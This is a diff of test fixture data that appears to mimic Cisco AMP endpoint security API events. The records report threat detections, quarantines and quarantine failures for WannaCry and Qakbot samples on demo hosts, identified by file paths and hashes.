-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
\ No newline at end of file
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
